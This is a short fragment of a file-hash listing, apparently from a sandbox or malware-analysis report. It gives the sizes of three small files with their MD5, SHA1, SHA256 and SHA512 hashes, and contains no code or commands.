SHA256ccaf45b19838ab67444ad6df528545ffd72b7d68060b4fcedcfc2a1f7a855e3c
SHA51266235e9912a1cb62d6d6a997d2f8e56ee656fb1aae12499cc54a2773c2edd240c0e5bdec355caa65e035180a26e5f203234de00b61b2681a63c66770d1156a7f
-
Filesize
652B
MD513ad2a7181de74455035a56a63f5c8a8
SHA127bd674941e747bc4daa87f08004fbeca0d32b4f
SHA256f8db8bca73b03a7dbaee0e4363f76cbdc37772a829ef78a79b5ba2acf12f39f8
SHA512b63a11c3a47fa7aa672b7ac5b0762f782d8e8a829df749500ca39e65d4abd7a0ac4f70983f239f3b737f8eb5e34e9cde01d2b1be0330710284f2f03940ba496e
-
Filesize
487B
MD5ec9211d8c72f21a987a7352367f9a790
SHA17c513a66a26f28514e820f65c7b0cc5f47966295
SHA256f16e7c3d9c844d3e5a58436c50ed9562b5c1ba9c7786c04c179514284716b136
SHA51281d9ab17eb0c2a1c96dd48c3a572c5548664e7bfeb07b819b83d50479f23f4c42d1278af6ae185b91ca2aecf4823be20d968e21b354f4de808b43d375be89976
-
Filesize
369B
MD5e5b02a952becd7f6d473d6caaa4841e4
SHA1c8465c3c0e5598ceb819e549aebd8c32f4464f56
SHA2566a803a5b4e6108e34b6b93fe39c4fb45339a35d3fe72bc2e02cdc33feeb2cd3d
SHA512a9ae3d6695ec972f32b8f85b400855d6a6b30db2299feb77513d94acad3383b989e27e359c7d87067dfcb4e5a2fe162143e8910f6d6e7cc2d07cdd13ed89989a